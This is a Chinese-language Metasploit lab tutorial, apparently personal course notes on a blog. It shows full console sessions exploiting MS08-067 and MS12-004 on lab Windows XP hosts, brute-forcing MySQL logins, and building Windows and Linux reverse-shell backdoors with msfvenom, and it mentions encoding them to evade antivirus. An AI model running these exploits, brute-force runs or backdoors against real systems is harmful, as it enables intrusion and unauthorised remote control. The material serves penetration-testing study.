本文是"T00LS Metasploit(第二季)"的文档版,是个人在观看视频动手操作的一个记录,仅供学习。文中会介绍Metasploit的一些基本使用:主要包括远程代码执行、MIDI文件解析远程代码执行、密码破解、生成后门等。

一、远程代码执行

MS08-067

  首先,我们准备了一台靶机:192.168.1.103  [Windows XP Professional]

msf > search ms08-067

Matching Modules

================

   Name                                 Disclosure Date  Rank   Description

   ----                                 ---------------  ----   -----------

   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       The SMB service port (TCP)

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name

   --  ----

   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 192.168.1.103

rhost => 192.168.1.103

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name

   --  ----

   0   Automatic Targeting

   1   Windows 2000 Universal

...  
【有很多,就不一一展示了】
...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.1.103    yes       The target address

   RPORT    445              yes       The SMB service port (TCP)

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST     192.168.1.110    yes       The listen address

   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Automatic Targeting

  注意需要设置一下LHOST和LPORT参数,默认是本机ip监听4444端口,如果要攻击外部ip的话,需要提供一个外部ip地址。下面是利用成功的截图:

MS17-010

  关于MS17-010的利用方法请移步: SMB MS17-010, 这里就不做重复介绍了。

MIDI文件解析远程代码执行

  靶机:192.168.1.111(XP) 攻击机:192.168.1.110(Kali)

msf exploit(ms08_067_netapi) > search 12-004

Matching Modules

================

   Name                                   Disclosure Date  Rank    Description

   ----                                   ---------------  ----    -----------

   exploit/windows/browser/ms12_004_midi  2012-01-10       normal  MS12-004 midiOutPlayNextPolyEvent Heap Overflow

msf exploit(ms08_067_netapi) > use exploit/windows/browser/ms12_004_midi

msf exploit(ms12_004_midi) > show options

Module options (exploit/windows/browser/ms12_004_midi):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   OBFUSCATE  false            no        Enable JavaScript obfuscation

   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

   SRVPORT    8080             yes       The local port to listen on.

   SSL        false            no        Negotiate SSL for incoming connections

   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)

   URIPATH                     no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name

   --  ----

   0   Automatic

  需要设置两个重要的参数:SRVHOST:设置为本机地址, SRVPORT:监听端口(默认即可),另外就是URIPATH:"友好"访问地址。

msf exploit(ms12_004_midi) > set SRVHOST 192.168.1.110    【设置为本机地址】

SRVHOST => 192.168.1.110

msf exploit(ms12_004_midi) > set URIPATH /

URIPATH => /

msf exploit(ms12_004_midi) > show options

Module options (exploit/windows/browser/ms12_004_midi):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   OBFUSCATE  false            no        Enable JavaScript obfuscation

   SRVHOST    192.168.1.110    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

   SRVPORT    8080             yes       The local port to listen on.

   SSL        false            no        Negotiate SSL for incoming connections

   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)

   URIPATH    /                no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name

   --  ----

   0   Automatic

msf exploit(ms12_004_midi) > exploit

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.110:4444

msf exploit(ms12_004_midi) > [*] Using URL: http://192.168.1.110:8080/      【在靶机中用IE浏览器访问该地址】

[*] Server started.

[*] 192.168.1.111    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

[*] 192.168.1.111    ms12_004_midi - Sending html to 192.168.1.111:1222...

[*] 192.168.1.111    ms12_004_midi - Request as: Windows-Media-Player/10.00.00.4058

[*] 192.168.1.111    ms12_004_midi - Sending midi corruption file...

[*] 192.168.1.111    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

[*] 192.168.1.111    ms12_004_midi - Sending midi corruption file...

[*] Sending stage (957487 bytes) to 192.168.1.111

[*] Meterpreter session 3 opened (192.168.1.110:4444 -> 192.168.1.111:1225) at 2017-08-22 10:22:27 -0400

[*] Session ID 3 (192.168.1.110:4444 -> 192.168.1.111:1225) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'

[*] Current session process is iexplore.exe (3300) as: CHINA-5D20EA9B7\Administrator

[*] Session is Admin but not System.

[*] Will attempt to migrate to specified System level process.

[*] Trying services.exe (760)

[+] Successfully migrated to services.exe (760) as: NT AUTHORITY\SYSTEM

  经过上述的攻击过程,可以成功的拿到一个session。

msf exploit(ms12_004_midi) > sessions    【查看会话】

Active sessions

===============

  Id  Type                     Information                                      Connection

  --  ----                     -----------                                      ----------

  3   meterpreter x86/windows  CHINA-5D20EA9B7\Administrator @ CHINA-5D20EA9B7  192.168.1.110:4444 -> 192.168.1.111:1225 (192.168.1.111)

msf exploit(ms12_004_midi) > sessions -i 3    【-i 指定会话】

[*] Starting interaction with 3...

meterpreter > ipconfig                【可以成功的拿到一个meterpreter】

密码破解

Mysql密码破解

  由于实验环境限制,先给出操作步骤,后面再给出运行示例截图...

msf > search mysql_login      [mysql登陆认证]

Matching Modules

================

   Name                                 Disclosure Date  Rank    Description

   ----                                 ---------------  ----    -----------

   auxiliary/scanner/mysql/mysql_login                   normal  MySQL Login Utility

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description

   ----              ---------------  --------  -----------

   BLANK_PASSWORDS   false            no        Try blank passwords for all users

   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5

   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database

   DB_ALL_PASS       false            no        Add all passwords in the current database to the list

   DB_ALL_USERS      false            no        Add all users in the current database to the list

   PASSWORD                           no        A specific password to authenticate with

   PASS_FILE                          no        File containing passwords, one per line

   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]

   RHOSTS                             yes       The target address range or CIDR identifier

   RPORT             3306             yes       The target port (TCP)

   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host

   THREADS           1                yes       The number of concurrent threads

   USERNAME                           no        A specific username to authenticate as

   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line

   USER_AS_PASS      false            no        Try the username as the password for all users

   USER_FILE                          no        File containing usernames, one per line

   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set rhosts 192.168.1.104

rhosts => 192.168.1.104

msf auxiliary(mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(mysql_login) > cat /root/pass.txt      [查看密码字典内容]

[*] exec: cat /root/pass.txt

aaa

bbb

ccc

ddd

123456

qwerty

admin

passwd

haha

hello

world

msf auxiliary(mysql_login) > set USERPASS_FILE /root/pass.txt    [设置密码字典文件]

USERPASS_FILE => /root/pass.txt

msf auxiliary(mysql_login) > set threads 10               [设置运行线程数]

threads => 10
msf auxiliary(mysql_login) > run
...

后门

  生成各种后门,请戳:msfvenom生成各类Payload命令

windows exe后门

  下面将介绍windows后门的使用,攻击机:192.168.1.107(kali)      靶机:192.168.1.111(Win XP)

  首先要生成后门,以windows/meterpreter/reverse_tcp为例:

root@kali:~# msfconsole

IIIIII    dTb.dTb        _.---._

  II     4'  v  'B   .'"".'/|\`.""'.

  II     6.     .P  :  .' / | \ `.  :

  II     'T;. .;P'  '.'  /  |  \  `.'

  II      'T; ;P'    `. /   |   \ .'

IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

       =[ metasploit v4.14.27-dev                         ]

+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]

+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.1.107 LPORT=1234 -f exe > ./test.exe

[*] exec: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.1.107 LPORT=1234 -f exe > ./test.exe

No encoder or badchars specified, outputting raw payload

Payload size: 333 bytes

Final size of exe file: 73802 bytes

  我们可以看到,上面后门地址是攻击机的ip:192.168.1.107,端口为1234,生成后门之后,将其放到靶机192.168.1.111上,在攻击机进行如下操作:

msf > use exploit/multi/handler

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp        【其实是刚才那个后门payload】

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(handler) > set lhost 192.168.1.107      [设置反向连接的ip]

lhost => 192.168.1.107    

msf exploit(handler) > set lport 1234            [设置反向连接的端口]

lport => 1234

msf exploit(handler) > run                   [run之后在靶机win xp上运行后门test.exe]

[*] Started reverse TCP handler on 192.168.1.107:1234

[*] Starting the payload handler...

[*] Sending stage (957487 bytes) to 192.168.1.111

[*] Meterpreter session 1 opened (192.168.1.107:1234 -> 192.168.1.111:1470) at 2017-08-23 03:41:20 -0400

meterpreter > ipconfig

  这样我们就能拿到一个meterpreter了,然后就可以自己发挥了。运行截图如下:

想更多了解msfvenom 生成windows后门,请戳下面两个链接:
【译】msfvenom

【原创】通过MSFVenom生成exe后门木马拿shell

Linux后门

  下面将简单演示一下linux后门的使用。攻击机:192.168.1.107(kali)      靶机:192.168.1.103(ubuntu16.04)

  先生成linux后门: linux/x86/meterpreter/reverse_tcp, 在kali上操作如下:

msf > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4321 -f elf > shell.elf

[*] exec: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4321 -f elf > shell.elf

No platform was selected, choosing Msf::Module::Platform::Linux from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 99 bytes

Final size of elf file: 183 bytes

msf > chmod 777 shell.elf        [赋予执行权限]

[*] exec: chmod 777 shell.elf

  将生成的后门拷贝的靶机:192.168.1.103上, 在攻击机:192.168.1.107进行如下操作:

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

payload => linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LHOST                   yes       The listen address

   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.107      [设置本机ip]

LHOST => 192.168.1.107

msf exploit(handler) > set LPORT 4321            [设置监听端口]

LPORT => 4321

msf exploit(handler) > run                   [run之后,在靶机上运行后门程序shell.elf]

[*] Started reverse TCP handler on 192.168.1.107:4321

[*] Starting the payload handler...

[*] Sending stage (797784 bytes) to 192.168.1.103

[*] Meterpreter session 1 opened (192.168.1.107:4321 -> 192.168.1.103:39498) at 2017-08-23 04:33:08 -0400

meterpreter > ifconfig                     [可以拿到一个meterpreter]

  剩下的就自己发挥了,下面是运行时截图:

  其他后门就先不介绍了,参考前面给出的:msfvenom生成各类Payload命令, 及结合前面两个示例,应该问题不大,有时间再补充吧。

  后门这部分,其实不仅仅是生成一个简单的后门,其更应该具有免杀特性,msfvenom 在生成后门的同时可以进行编码,而且还可以使用工具进行加壳,提高隐蔽性。

未完,待续...

Metasploit 进阶的更多相关文章

  1. 6.Metasploit生成apk攻击Android实例

    Metasploit进阶第四讲 生成Android  apk文件 01  msfvenom基本参数 msfvenom介绍 承接上回,staged/unstage payload如何利用? msfven ...

  2. 5.Metasploit攻击载荷深入理解

    Metasploit 进阶第三讲 深入理解攻击载荷   01 Nesus介绍.安装及使用 Nessus介绍 Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库. ...

  3. 4.Metasploit框架更新

    Metasploit 进阶第二讲  框架更新   EDB平台-互联网安全漏洞库   Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况 ...

  4. 3.Metasploit攻击流程及命令介绍

    Metasploit 进阶第一讲    攻击流程及命令介绍   01.渗透测试过程环节(PTES)   1.前期交互阶段:与客户组织进行交互讨论,确定范围,目标等 2.情报搜集阶段:获取更多目标组织信 ...

  5. Web安全工程师(进阶)课程表

    01-SQL注入漏洞原理与利用 预备知识: 了解HTTP协议,了解常见的数据库.脚本语言.中间件.具备基本的编程语言基础. 授课大纲: 第一章:SQL注入基础 1.1 Web应用架构分析1.2 SQL ...

  6. nmap扫描进阶、msfconsole攻击入门(网安全实训第二天)

    本期内容:nmap扫描.msfconsole攻击入门 1. nmap扫描进阶 2.msfconsole攻击入门 1.nmap扫描进阶 (1)nmap命令 nmap --sP -iL abin.txt ...

  7. nodejs进阶(6)—连接MySQL数据库

    1. 建库连库 连接MySQL数据库需要安装支持 npm install mysql 我们需要提前安装按mysql sever端 建一个数据库mydb1 mysql> CREATE DATABA ...

  8. nodejs进阶(4)—读取图片到页面

    我们先实现从指定路径读取图片然后输出到页面的功能. 先准备一张图片imgs/dog.jpg. file.js里面继续添加readImg方法,在这里注意读写的时候都需要声明'binary'.(file. ...

  9. JavaScript进阶之路(一)初学者的开始

    一:写在前面的问题和话 一个javascript初学者的进阶之路! 背景:3年后端(ASP.NET)工作经验,javascript水平一般般,前端水平一般般.学习资料:犀牛书. 如有误导,或者错误的地 ...

随机推荐

  1. Vue 自定义指令练习

    Vue.directive(id,definition)注册一个全局自定义指令,接收两个参数,指令ID以及定义对象 取值: <div v-demo="{ color: 'white', ...

  2. SQL入门之多表查询

    如果查询需要针对两个或者更多个表,则在需要涉及到表的连接操作(join). 0.笛卡儿积 最简单的连接方式是直接在from子句中加入两个表,并且用join操作符隔开.形式为Table1 join Ta ...

  3. 【Python】Python基础教程系列目录

    Python是一个高层次的结合了解释性.编译性.互动性和面向对象的脚本语言. 在现在的工作及开发当中,Python的使用越来越广泛,为了方便大家的学习,Linux大学 特推出了 <Python基 ...

  4. UVA11736_Debugging RAM

    题目绝对够水,我就不详细说明了. 直接上代码吧.只是提示一下要用 unsigned long long. (不知道我不用字典树为什么会超时,肿么搞的) #include <iostream> ...

  5. Strus默认跳转方式是请求转发 地址栏不变 与javaweb的内部转发一样

    Strus默认跳转方式是请求转发 地址栏不变 与javaweb的内部转发一样

  6. Android Native jni 编程 Android.mk 文件编写

    LOCAL_PATH 必须位于Android.mk文件的最开始.它是用来定位源文件的位置,$(call my-dir)的作用就是返回当前目录的路径. LOCAL_PATH := $(call my-d ...

  7. unity3D 涂涂乐使用shader实现上色效果

    unity3D 涂涂乐使用shader实现上色效果 之前我博文里面发过一个简单的通过截图方式来实现的模型上色方法,但是那个方法不合适商用,因为你需要对的很准确才可以把贴图完美截取下来,只要你手抖了一下 ...

  8. arp 投毒实验

    1.查看kali2.0和kali2.0.0的IP地址,如图1和图2,其中192.168.1.133作为攻击者,192.168.1.109作为PC访问FTP服务器192.168.1.234 图1 图2 ...

  9. MSSQL代理工作服务器远程命令执行

    概述 如果MSSQL数据库中开启了MSSQL Server Agent Job服务的话,攻击者将可以利用MSSQL Server中自带的功能来获取一个shell. SQL Server Agent S ...

  10. 20165218 实验二 Java面向对象程序设计

    实验二 Java面向对象程序设计 课程:java程序设计 姓名:赵冰雨 学号:20165218 指导教师:娄嘉鹏 实验日期:2018.4.16 实验密级:Java开发环境的熟悉 实验内容.步骤与体会: ...